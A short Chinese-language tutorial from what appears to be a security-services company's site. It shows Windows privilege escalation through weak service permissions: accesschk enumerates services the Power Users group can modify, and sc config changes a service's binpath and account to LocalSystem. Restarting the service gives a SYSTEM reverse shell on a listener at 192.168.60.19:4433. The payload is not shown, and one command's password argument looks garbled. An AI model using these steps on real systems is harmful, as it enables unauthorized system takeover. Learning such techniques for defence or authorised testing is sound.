Windows低权限提权_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

Windows低权限提权

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


Windows低权限提权

用户test隶属于Power User组,  登入系统,IP为192.168.60.23,监听服务IP地址为192.168.60.19 用到的工具:工具:accesschk 执行accesschk.exe -uwcqv "Power Users" * 获取可以操作的服务名称信息;  sc qc kdc查询kdc服务详细信息 查看系统启动的服务 修改参数binpath的值 执行sc config DcomLaunch obj= ".LocalSystem" password= "Windows低权限提权"在重新启动DcomLaunch,在192.168.60.19监听的4433端口成功获取反弹,系统权限

Windows低权限提权